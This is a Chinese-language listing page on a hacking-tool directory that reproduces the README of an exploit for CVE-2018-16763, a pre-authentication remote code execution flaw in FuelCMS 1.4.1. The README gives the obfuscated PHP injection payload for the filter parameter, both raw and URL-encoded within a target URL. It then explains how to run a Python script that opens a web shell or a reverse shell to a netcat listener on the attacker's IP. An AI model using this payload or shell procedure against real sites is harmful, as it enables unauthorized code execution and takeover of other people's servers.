Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-16763_FuelCMS-1.4.1_RCE — FuelCMS 1.4.1 命令注入/远程代码执行。 | Kitploit
工具/GitHubGitHub/bad-c0de/cve-2018-16763_fuelcms-1.4.1_rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubbad-c0de/cve-2018-16763_fuelcms-1.4.1_rce

CVE-2018-16763_FuelCMS-1.4.1_RCE

FuelCMS 1.4.1 命令注入/远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
11个月前尚未审核

# CVE-2018-16763 FuelCMS - 1.4.1 - RCE PoC

FuelCMS 1.4.1 允许通过 pages/select/ 的 filter 参数或 preview/ 的 data 参数进行 PHP 代码执行,这可能导致预认证远程代码执行。

# 漏洞利用

其工作原理是利用 PHP 的 filter 参数,该参数允许您使用 system 函数发送任意命令。

然后对载荷进行混淆:

'+pi(print($a='system'))+$a('<YOUR COMMAND HERE>')+'

因此看起来大致是这样的:

http://<TARGET>/fuel/pages/select/?filter='+pi(print($a='system'))+$a('<YOUR COMMAND HERE>')+'

然后对所有字符进行 URL 编码:

http://<TARGET>/fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27system%27%29%29%2B%24a%28%27%3CYOUR%20COMMAND%20HERE%3E%27%29%2B%27

感谢 Omer Citak 发现此漏洞。

# 用法

使用 python3 cve-2018-16763.py 运行漏洞利用程序

您可以输入 1 选择 Web-Shell,或输入 2 选择 Reverse-Shell

# Web-Shell

对于 Web-Shell,您只需提供您的 TARGET URL: webshell

# Reverse-Shell

设置监听器:nc -lvnp <PORT>

运行漏洞利用程序并提供以下信息:

  1. TARGET URL
  2. ATTACKER IP
  3. LISTENER PORT image

成功获取 Shell。

image
下载工具